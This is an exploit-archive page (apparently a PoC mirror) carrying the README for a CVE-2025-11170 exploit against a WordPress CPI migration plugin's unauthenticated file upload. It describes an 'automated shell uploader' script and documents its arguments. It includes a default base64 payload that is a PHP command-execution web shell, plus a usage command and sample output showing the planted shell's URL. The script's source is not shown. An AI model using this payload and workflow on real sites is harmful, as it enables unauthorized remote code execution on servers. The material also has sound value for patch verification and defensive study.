Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-11170 PoC — WordPress plugin WP移行専用プラグイン for CPI 代码问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin WP移行専用プラグイン for CPI 代码问题漏洞 (CVE-2025-11170)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin WP移行専用プラグイン for CPI 1.0.2及之前版本存在代码问题漏洞,该漏洞源于Cpiwm_Import_Controller::import函数缺少文件类型验证,可能导致未经验证的攻击者上传任意文件,进而导
Description
WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload
Readme
# CVE-2025-11170
WP移行専用プラグイン for CPI &lt;= 1.0.2 - Unauthenticated Arbitrary File Upload


# 🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload

## 📝 Description

The **WP移行専用プラグイン for CPI** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `Cpiwm_Import_Controller::import` function in all versions up to, and including, 1.0.2.  
This allows unauthenticated attackers to **upload arbitrary files** to the affected site's server, potentially enabling remote code execution.

## 🛡️ Vulnerability Details

- **CVE:** CVE-2025-11170  
- **CVSS Score:** 9.8 (**Critical**)  
- **Attack Vector:** Unauthenticated remote file upload

## ⚡ Script Info

- **Script Name:** `CVE-2025-11170.py`
- **Purpose:** Automated shell/file uploader exploit for vulnerable WordPress CPI migration plugin.

## 🔧 Usage

### Arguments

| Argument               | Description                                                                                 |
|------------------------|---------------------------------------------------------------------------------------------|
| `-u`, `--url`          | **Base target URL** (e.g., `http://target.com/wordpress/`). The script appends `wp-admin/admin-ajax.php` automatically. |
| `-f`, `--filename`     | Shell or file name to upload. Default: `shell.php`                                         |
| `-d`, `--data`         | File content in base64 (or raw text). Default: `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`   |
| `-i`, `--index`        | Index field value. Default: `0`                                                            |
| `-H`, `--headers`      | Extra HTTP headers (format: `X-Key:Value;K2:Value2`)                                       |
| `-t`, `--timeout`      | Timeout for HTTP request (seconds). Default: `10`                                          |
| `--retries`            | Number of retry attempts. Default: `3`                                                     |
| `--backoff`            | Backoff factor between retries (seconds). Default: `0.7`                                   |
| `-v`, `--verbose`      | Increase verbosity for debugging (repeatable)                                              |

### 🚦 Methods Explained

- **Nxploited_parse_args**  
  Parses and validates input arguments. Ensures the right endpoint structure, headers, and data encoding.

- **Nxploited_logging**  
  Sets up advanced logging and verbosity for a detailed or minimal runtime output.

- **Nxploited_retry_session**  
  Initializes a persistent session with retry and backoff logic for resilient communications.

- **Nxploited_build_payload**  
  Constructs the POST request parameters for exploitation.

- **Nxploited_send**  
  Performs the actual POST request to the vulnerable endpoint and manages responses/errors.

- **Nxploited_output_result**  
  Processes and formats the response, displaying shell path on success, or debugging info otherwise.

---

### 💡 Example Usage

```bash
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
```

**Example Output:**
```
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
```

---

## 🚨 Disclaimer

This script is provided **for educational purposes only**.  
Usage of this exploit on targets without proper authorization may be illegal.  
The author assumes **NO responsibility** for any misuse, damages, or legal consequences.

---

## 📢 Reach Me

GitHub: [Nxploited](https://github.com/Nxploited)  
Telegram: [KNxploited](https://t.me/KNxploited)

---

**_By: Nxploited ( Khaled Alenazi )_**
File Snapshot

[4.0K] /data/pocs/c7a0dd11a80378159242c94591b64582541b8230 ├── [5.3K] CVE-2025-11170.py ├── [1.5K] LICENSE ├── [3.8K] README.md └── [ 17] requirements.txt 1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.